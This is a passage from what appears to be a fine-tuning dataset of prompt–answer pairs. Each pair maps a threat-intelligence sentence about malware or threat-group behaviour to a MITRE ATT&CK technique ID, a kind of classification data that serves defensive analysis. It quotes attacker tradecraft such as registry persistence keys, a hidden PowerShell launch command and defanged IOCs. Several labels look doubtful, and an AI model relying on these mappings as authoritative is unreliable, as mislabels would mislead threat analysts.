framework.,TA551 has sent spearphishing attachments with password protected ZIP files.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec is capable of using SMTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has gathered information about running services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has created VBScripts to run an SSH server.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT uses mshta.exe to run malicious scripts on the system.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has also researched third-party websites to help it craft credible spearphishing emails.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can access the victim’s webcam and record video.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 set the hostnames of its C2 infrastructure to match legitimate hostnames in the victim environment.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Flame can record audio using any existing hardware recording devices.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky searches for network drives and removable media and duplicates itself onto them.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another JHUHUGIT variant gathers the victim storage volume serial number and the storage device name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERTON can use WMI for persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After initial compromise, Chaos will download a second stage to establish a more permanent presence on the affected system.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dacls can download its payload from a C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The real file extension may be hidden by the operating system in the file browser , as well as in any software configured using or similar to the system’s policies.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about domains and their properties may include a variety of details, including what domain the victim owns as well as administrative data and more directly actionable information such as contacts , business addresses, and name servers.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker can identify network adjacent and accessible drives.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To perform proper validation, filters must receive plain-text credentials from the LSA.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon uses commands such as netsh advfirewall firewall to discover local firewall settings.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group deleted the DLL dropper from the victim’s machine to cover their tracks.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout has used folder icons for malicious files to lure victims into opening them.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,hxxp://www.sanjosemaristas[.]com/app/index.php?{A01BA0AD-9BB3-4F38-B76B-A00AD11CBAAA}, providing the current network adapter’s service name GUID### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used a Powershell cmdlet to grant the ApplicationImpersonation role to a compromised account.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware attempts to determine the installed version of .NET by querying the Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has developed malware for its operations, including malicious mobile applications and destructive malware such as NotPetya and Olympic Destroyer.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can also delete itself from the infected system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ” is queried to check the values ConsentPromptBehaviorAdmin and PromptOnSecureDesktop### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be done by either executing a new or modified service.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar has the ability to identify domain administrator accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BUBBLEWRAP can communicate using SOCKS.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker adds keys to the Registry at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services and various other Registry locations.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk deletes Application, Security, Setup, and System Windows Event Logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST created VBScripts that were named after existing services or folders to blend into legitimate activities.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework., DWriteCreateFactory() ### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources Information stored in a repository may vary based on the specific instance or environment.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has collected the OS version and computer name from victims.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has used the Windows command shell to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used malicious macros embedded inside Office documents to execute files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has used cmd.exe to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE can execute shell commands using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Login items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT creates a scheduled task to ensure it is re-executed everyday.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx has the ability to modify the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The verb get can be used in a myriad of ways to retrieve information for a machine, however in this case os get /format: is being abused to download payloads from non-local resources with .xsl extensions### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke uses scheduled tasks typically named ""Watchmon Service"" for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis will decrypt important strings used for C&C communication.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency .### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used multiple command-line utilities to enumerate running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The first dropped file, doc.exe, contains the CVE-2014-4113 exploit and then attempts to execute test.exe with the elevated privileges### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For each user, this file resides at the same location: ~/.bash_history.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 used a batch script to perform a series of discovery techniques and saves it to a text file.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto runs the ifconfig command to obtain the IP address from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Within MFT entries are file attributes, such as Extended Attributes and Data known as Alternate Data Streams when more than one Data attribute is present, that can be used to store arbitrary data .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor performs the injection by attaching its code into the APC queue using NtQueueApcThread API.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes steals credentials stored inside Internet Explorer.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use net localgroup to list local groups on a system.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist has used HTTP GET and POST requests over port 443 for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro has used HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has also been used to download and execute additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker can enumerate removable drives prior to the encryption process.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Timers can be set to run on a calendar event or after a time span relative to a starting point.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST encrypted C2 traffic using a single-byte-XOR cipher.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised access tokens may be used as an initial step in compromising other services.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via Ingress Tool Transfer or Lateral Tool Transfer.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs can obtain information on installed anti-malware programs.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uses netstat -ano to search for specific IP address ranges.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth has used malicious files including VBS, LNK, and HTML for execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYS Deletes the file named by tempPath + “ky” file so as not to upload anything### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This method may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has run tasklist on a victim's machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has used Rundll32 to execute its loader for privilege escalation purposes.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to ""ignorespace"".### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may choose to do this if they have sufficient access and proximity.### Assistant: T1011: Exfiltration Over Other Network Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, a user is notified when someone else is trying to steal their session.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PHOREAL is capable of manipulating the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has created a new registry entry at HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Run\Graphics with a value of C:\ProgramData\Initech\Initech.exe /run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has created KeyBase accounts to communicate with ransomware victims.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx has the ability to enumerate system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Then, it will launch Dec.exe using PowerShell with the command “ cmd.exe /c powershell - WindowStyle Hidden Start-Process Dec.exe - WindowStyle maximized ”.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used VMProtect to pack and protect files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Later variants upload the file to a web server via an HTTP post command### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN collects data stored in the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Phishing may also be conducted via third-party services, like social media platforms.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Microsoft transport agents to establish persistent access to systems.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can establish persistence by writing the Registry value MicroNativeCacheSvc to HKCU\Software\Microsoft\Windows\CurrentVersion\Run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER used spearphishing emails with malicious Microsoft Word attachments to infect victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM can capture screenshots of the victim’s desktop.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has maintained persistence using the startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects a list of running services with the command tasklist /svc.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has conducted port scans on a host.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use the same icon of the file they are trying to mimic.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has used UPX packers for its payload DLL.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has used Python scripts to deploy ransomware.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed creating new services to maintain persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GRIFFON has used PowerShell to execute the Meterpreter downloader TinyMet.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can use fileless UAC bypass and create an elevated COM object to escalate privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can detect the existence of remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Downdelph uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula encodes C2 traffic with single-byte XOR keys.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has used free dynamic DNS domains for C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Newer versions create the ""MaintenaceSrv"" and ""hdv_725x"" services.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke can be executed using rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DCShadow is a method of manipulating Active Directory data, including objects and schemas, by registering and simulating the behavior of a DC.### Assistant: T1207: Rogue Domain Controller" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT used file system monitoring to track modification and enable automatic exfiltration.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The list of possible protocols is extensive.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2: Excerpt of an APT33 malicious .hta file We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SCREEN Takes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to the C2 server using POST at the path “/FeedBack.php”### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used WMI for execution.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has masqueraded the svchost.exe process to exfiltrate data.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URL's.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon loads its modules using reflective loading or custom shellcode.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One version of Helminth uses a PowerShell script.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PATH environment variable contains a list of directories.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL can list connected devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote COM execution is facilitated by Remote Services such as Distributed Component Object Model .### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There exist user and global Registry keys for the Office Test feature: * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary uses HTTP or HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can Base64 encode payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape makes various native API calls.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network DoS can be performed by exhausting the network bandwidth services rely on.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mandiant initially identified an early variant of the POSHSPY backdoor deployed as PowerShell scripts during an incident response engagement in 2015### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search scan databases to gather actionable information.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can gather network share information.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The White Company has checked for specific antivirus products on the target’s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can execute enum to enumerate files in storage on a compromised system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon copies itself to the Startup folder to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy decodes its secondary payload and writes it to the victim’s machine.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In February 2018, several KHRAT associated domains began resolving to the IP address 89.46.222[.]97### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, adversaries may attempt to brute force access to Valid Accounts within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as OS Credential Dumping, Account Discovery, or Password Policy Discovery.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs downloads additional files from C2 servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 